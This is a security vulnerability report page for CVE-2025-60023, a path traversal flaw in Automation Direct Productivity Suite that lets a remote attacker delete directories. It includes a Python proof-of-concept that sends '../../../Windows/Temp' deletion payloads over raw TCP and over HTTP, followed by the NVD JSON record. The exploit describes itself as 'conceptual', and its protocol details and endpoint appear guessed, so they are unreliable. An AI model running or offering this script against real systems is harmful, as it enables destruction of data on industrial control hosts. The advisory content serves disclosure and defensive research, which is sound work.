Security Vulnerability Report
中文
CVE-2025-60023 CVSS 4.0 MEDIUM

CVE-2025-60023

Published: 2025-10-23 23:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and delete arbitrary directories on the target machine.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Automation Direct Productivity Suite < 4.4.1.19 (受影响的版本)
Automation Direct Productivity Suite = 4.4.1.19 (已验证受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct def exploit_cve_2025_60023(target_ip, target_port=2000): """ CVE-2025-60023 PoC - Productivity Suite Path Traversal Target: Automation Direct Productivity Suite 4.4.1.19 Description: Delete arbitrary directories via path traversal in ProductivityService Note: This is a conceptual PoC for educational and security testing purposes only. """ try: # Construct path traversal payload to delete C:\Windows\Temp # Using ../ to traverse to system directories payload = b'\x00\x00\x00' # Header payload += b'\x10' # Command type: delete directory # Path traversal sequence - traverse to delete arbitrary directory # Example: ../../../Windows/Temp or similar path traversal malicious_path = '../../../Windows/Temp\x00' payload += malicious_path.encode('ascii') # Send malicious payload sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(payload) # Receive response response = sock.recv(1024) sock.close() print(f'[+] Payload sent to {target_ip}:{target_port}') print(f'[+] Malicious path: {malicious_path}') print(f'[+] Response: {response}') return True except Exception as e: print(f'[-] Error: {str(e)}') return False # Usage example # exploit_cve_2025_60023('192.168.1.100', 2000) # Alternative HTTP-based exploitation (if web interface is exposed) def exploit_http(target_ip, target_port=80): """ HTTP-based path traversal exploitation """ import http.client # Path traversal payload for HTTP endpoint path = '/ProductivityService/delete?path=../../../../Windows/Temp' try: conn = http.client.HTTPConnection(target_ip, target_port, timeout=10) conn.request('GET', path) response = conn.getresponse() print(f'[+] HTTP Response Status: {response.status}') conn.close() return True except Exception as e: print(f'[-] HTTP exploitation failed: {str(e)}') return False

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60023", "sourceIdentifier": "[email protected]", "published": "2025-10-23T23:15:37.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and delete arbitrary directories on the target machine."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-296-01.json", "source": "[email protected]"}, {"url": "https://support.automationdirect.com/docs/securityconsiderations.pdf", "source": "[email protected]"}, {"url": "https://www.automationdirect.com/support/software-downloads", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-296-01", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.